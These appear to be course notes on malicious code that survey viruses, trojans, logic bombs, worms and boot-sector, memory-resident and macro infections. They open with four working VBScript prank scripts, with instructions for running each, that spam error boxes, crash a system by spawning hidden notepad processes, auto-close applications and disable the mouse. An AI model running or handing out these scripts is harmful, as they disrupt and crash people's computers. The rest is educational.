Viruses

virus:
1) Open notepad type the following and save it as fakemsg.vbs

do

msgbox "System Error : 423"

loop

 This script displays a message box with the message "System Error : 432"

 The message box gets invoked again and again if it is being closed.

To run vbs script

 Go to start -> Run -> type the full path with script name.

Output:

To stop the script:

 To stop a script running under Wscript, you need to stop the process in
Windows Task Manager.
  Open Task Manager (right-click the taskbar and select Task Manager, or type
taskmgr in the Run dialog box).

 On the Processes tab select wscript.exe and press End Process.

Check wsscript.exe:

2) Crash System :Open notepad type the following and save it as crashsystem.vbs

set ws=CreateObject("wscript.shell")

do

ws.run "notepad",0
 loop

 This program will infinitely open notepad in hidden mode causing system
memory to overload crash...!

 The value "0" in the third line specifies the mode in which the application should
run, here it is hidden mode.

3) Close applications automatically within 5 seconds

Open notepad type the following and save it as autoclose.vbs

set ws=CreateObject("wscript.shell")

do

ws.sendkeys "%{F4}"

wscript.sleep 5000

loop

 This script automatically close any opened Applications within 5 seconds

 Specify a larger time value by changing the line "wscript.sleep 5000"

 To close within 15 seconds then change the value from “5000” to “15000”.

4) Disable The Mouse

Open notepad type the following and save it as disablemouse.vbs

set ws=Createobject("wscript.shell")

for i=1 to 4

ws.run "WISPTIS.EXE",0

next

 This script temporarily disables the mouse functionality.

Why worry about Malicious code?

 Malicious code behaves in unexpected way.
  Malicious code can write a message on computer screen,stop a running
program,generate a sound or erase a stored file.

 Malicious code can do nothing - planted, lie dormant, undetected until some event
triggers the code to act. Trigger can be time or date, an event, a condition, a count or
combination.

Kinds of malicious code:

 Malicious code or rogue program is the general name for Unanticipated or Undesired
effects in programs or program parts, caused by an agent with intent on Damage.

 The agent is the writer of the program or the person who causes its distribution.

Virus:
 A virus is a program that can replicate itself and pass on malicious code to other
nonmalicious programs by modifying them.

Transient virus Resident virus

Transient virus has a life that depends on Resident virus locates itself in memory ;
the life of its host; virus runs when its then it can remain active or be activated as
attached program executes and terminates a stand alone program, even after its
when its attached program ends. attached program ends.

Trojan horse:
 Gets automatically installed along with an infected legitimate program.

 Once installed on target machine, it can perform various malicious operations like
deleting files, transmitting files to intruder, modifying files, installing other programs
that provide unauthorized access and execute privilege elevation attacks.

Malicious codes:
  Logic bomb- a class of malicious code that runs when a specified condition occur.

 Time bomb – a logic bomb whose trigger is time or date.

 Trapdoor or backdoor – someone can access the program with special privileges

The number 990099 in an automated bank teller program might allow to

process the log of everyone's transactions at the machine.

 A worm is a program that spreads copies of itself through a network.

 Rabbit is a virus or worm that self replicates without bound. It tries to exhaust the
resources.

A rabbit might create copies of itself and store them on the disk to completely
fill the disk.

Difference between virus and worm:

 A worm operates through networks and a virus can spread through any medium.

 Worm spreads copies of itself as a stand alone program, virus spreads copies of itself as
a program that attaches to or embeds in other programs.

How viruses attach:

 Virus may be on CD, when executed virus copies itself on permanent storage.

 Virus is attached to E-mail. Virus writer convince the victim to open the attachment.

1) Appended viruses:

A virus program attaches itself to a program, whenever the program

is run, the virus is activated.

2) Viruses that surround a program:

Virus is attached to original program but has control before and after execution.

Virus writer wants to prevent virus from being detected.

If virus is stored on disk, the filename or its size may help in detection.
 Virus writer attaches virus to the program that constructs listing of files on disk.
If virus regains control after the listing program that generated list but before the listing
is displayed or printed, the virus could eliminate its entry from listing.

3) Integrated viruses and replacements

Virus replaces some of the targets and integrate itself into the original code of

the target.

Document viruses:
 Implemented within a formatted document, such as a written document,a database, a
slide presentation, a picture or a spreadsheet.

 These documents are highly strucutred file that contain both data and
commands(included in macros,variables,procedures,file accesses and system calls).

 The virus writer can use any feature of document to perform malicious country.

How viruses gain control:

 Virus (V) is to be invoked instead of target(T).
Homes for viruses:
The virus writer may find these qualities appealing in a virus:

• It is hard to detect.

• It is not easily destroyed or deactivated.

• It spreads infection widely.

• It can reinfect its home program or other programs.

• It is easy to create.

• It is machine independent and operating system independent.

How viruses gain control:

  Many viruses are transmitted by e-mail, using either of two routes.

 In the first case, some virus writers generate a new e-mail message to all addresses in
the victim's address book. These new messages contain a copy of the virus so that it
propagates widely.

• The new first recipient opens the attachment from a friend. For example, the subject
line or message body may read "I thought you might enjoy this picture from our
vacation.“

 In the second case, the virus writer can leave the infected file for the victim to forward
unknowingly. If the virus's effect is not immediately obvious, the victim may pass the
infected file unwittingly to other victims.

Viral residence - One-Time Execution:

 The majority of viruses today execute only once, spreading their infection and causing
their effect in that one execution.

 A virus often arrives as an e-mail attachment of a document virus. It is executed just by

being opened.

Viral residence - Boot Sector Viruses:

• When a computer starts, control begins with firmware that determines which hardware
components are present, tests them, and transfers control to an operating system.

• After the hardware test, operating systems, is invoked dynamically, perhaps even by a
user's choice, after the hardware test.

• The operating system is software stored on disk. bootstrap (often boot) load copies the
operating system from disk to memory and transfers control to it; because the
operating system figuratively pulls itself into memory by its bootstraps.

• The firmware does its control transfer by reading a fixed number of bytes from a fixed
location on the disk called the boot sector to a fixed address in memory and then
jumping to that address (which will turn out to contain the first instruction of the
bootstrap loader).

• The bootstrap loader then reads into memory the rest of the operating system from
disk.
 • To run a different operating system, the user just inserts a disk with the new operating
system and a bootstrap loader.

• When the user reboots from this new disk, the loader there brings in and runs another
operating system. This same scheme is used for personal computers, workstations, and
large mainframes.

• The virus gains control very early in the boot process, before most detection tools are
active

• Virus can avoid, or at least complicate, detection.

• The files in the boot area are crucial parts of the operating system. To keep users from
accidentally modifying or deleting them with disastrous results, the operating system
makes them "invisible" by not showing them as part of a normal listing of stored files,
preventing their deletion.

• The virus code is not readily noticed by users.

Viral residence - Memory-Resident Viruses:

  Very frequently used parts of the operating system and for a few specialized user
programs, code remains in memory and is called "resident" code.

 Examples of resident code are the routine that interprets keys pressed on the keyboard,
the code that handles error conditions that arise during a program's execution, or a
program that acts like an alarm clock, sounding a signal at a time the user determines.

 Resident routines are sometimes called TSRs or "terminate and stay resident" routines.

 Virus writers also like to attach viruses to resident code because the resident code is
activated many times while the machine is running.

 Each time the resident code runs, the virus does too. Once activated, the virus can look
for and infect uninfected carriers.

 For example, after activation, a boot sector virus might attach itself to a piece of
resident code. Then, each time the virus was activated it might check whether any
removable disk in a disk drive was infected and, if not, infect it.

Other Homes for Viruses:

 One popular home for a virus is an application program. Many applications, such as
word processors and spreadsheets, have a "macro" feature, by which a user can record
a series of commands and repeat them with one invocation. Such programs also provide
a "startup macro" that is executed every time the application is executed.

 A virus writer can create a virus macro that adds itself to the startup directives for the
application. It also then embeds a copy of itself in data files so that the infection spreads
to anyone receiving one or more of those files.

 Libraries are used by many programs, malicious code residing there will have a broad
effect.

 libraries are shared among users and transmitted from one user to another, a practice
that spreads the infection.

 Finally, executing code in a library can pass on the viral infection to other transmission
media.

 Compilers, loaders, linkers, runtime monitors, runtime debuggers, and even virus
control programs are good candidates for hosting viruses because they are widely
shared.